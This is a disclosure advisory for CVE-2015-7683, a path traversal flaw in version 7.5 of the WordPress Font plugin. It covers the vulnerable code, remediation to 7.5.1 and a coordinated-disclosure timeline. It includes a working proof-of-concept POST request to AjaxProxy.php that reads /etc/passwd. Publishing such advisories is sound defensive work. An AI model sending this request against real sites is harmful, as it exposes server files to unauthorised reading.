WordPress Font 7.5 Path Traversal

`  
Details  
================  
Software: Font  
Version: 7.5  
Homepage: https://wordpress.org/plugins/font/  
CVE: CVE-2015-7683 (Pending)  
CVSS: 6.3 (Medium; AV:N/AC:M/Au:S/C:C/I:N/A:N)  
CWE: CWE-22  
  
Description  
================  
An absolute path traversal vulnerability in Font 7.5 allows WordPress admins read access to system files such as /etc/passwd. Font is a WordPress plugin with over 40,000 active installs.  
  
Vulnerability  
================  
The vulnerability is due to the unsanitized POST parameter 'url' being passed to file_get_contents() via file_get_contents2().  
  
>From font/Font.php:  
139: $contents = $this->file_get_contents2($_POST['url'], array_merge($dataArr, $serializedArr));  
. . .  
515: function file_get_contents2($src, $postData = false) {  
. . .  
550: $fileContents = @file_get_contents($src, false, $context);  
  
Proof of Concept  
================  
URL: http://localhost/wordpress/wp-content/plugins/font/AjaxProxy.php  
  
POST data:  
url=/etc/passwd&data%5Bblogurl%5D=http%3A%2F%2Flocalhost%2Fwordpress&data%5Bversion%5D=7.5&format=json&action=cross_domain_request  
  
Remediation  
================  
Upgrade the plugin to version 7.5.1 or higher.  
  
Timeline  
================  
2015-09-29: Discovered  
2015-09-30: Contacted vendor via plugin support form  
2015-10-01: Reported vulnerability to wordpress.org  
2015-10-02: CVE-2015-7683 assigned  
2015-10-04: Vendor releases version 7.5.1 - confirmed fixed  
2015-10-12: Public Disclosure  
  
References  
================  
[1] https://cwe.mitre.org/data/definitions/22.html  
  
Discovered by  
================  
David Moore @grajagandev  
`